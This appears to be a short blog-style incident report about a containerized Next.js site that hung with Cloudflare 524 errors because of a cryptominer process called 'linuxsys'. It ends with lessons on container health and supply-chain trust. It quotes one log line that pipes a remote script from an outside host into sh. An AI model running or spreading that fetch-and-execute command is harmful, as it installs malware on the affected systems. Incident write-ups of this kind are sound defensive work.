The System Was Up. The System Was Compromised.

The site was technically online.

The container was running.

Health checks did not scream.

next start said ready.

And still, the system was failing.

Not loudly.

Quietly.

Requests hung. Even /favicon.ico stalled. Cloudflare returned a 524. At first, it looked like one more infrastructure ghost story: maybe reverse proxy trouble, maybe Next.js behaving strangely, maybe a bad dependency.

It was none of those. Or at least not in the way I thought.

The first real clue was simple:

curl localhost:5600

Connection accepted.

Zero bytes returned.

That changed the question.

This was no longer why is the site down?

It became:

What is the application doing instead of serving requests?

That led to process inspection.

And that was where the illusion broke.

Inside the container sat a process I never deployed:

linuxsys

Burning CPU.

Starving the app.

Keeping the process “alive” while making the service unusable.

A healthy container.

An unhealthy system.

Then the logs showed something worse.

Repeated attempts to execute:

(curl ... repositorylinux.dpdns.org/linux.sh || wget ...) | sh

A remote script being piped into a shell from inside the runtime.

That was the moment this stopped being debugging.

It became incident response.

Later research suggested the pattern matched the Linuxsys cryptominer campaign. That explained the rogue process, the resource starvation, even the deceptive “everything looks fine” surface symptoms.

The 524 was not the incident.

It was the clue.

What made this unsettling was how ordinary everything looked.

Docker said up.

Ports were listening.

Node was running.

And the system was compromised.

That is a lesson in itself.

We often confuse process health with system health.

They are not the same.

Sometimes a service is down because it crashed.

Sometimes it is down because something else is using its oxygen.

This was the second kind.

The fix was a clean rebuild and dependency refresh, not blind restarts.

And a reminder:

Build artifacts deserve the same suspicion we reserve for infrastructure.

Trust is part of the attack surface.

Things I’m keeping from this

• A healthy container can lie.

• Timeouts can be CPU starvation wearing a networking mask.

• Supply chain thinking is not optional anymore.

• “The system is up” is not the same as “the system is safe.”

And maybe the biggest one:

The most dangerous failures often do not announce themselves.

They impersonate normal.

Until you ask the right question.

Why is even /favicon.ico hanging?

That question found the whole story.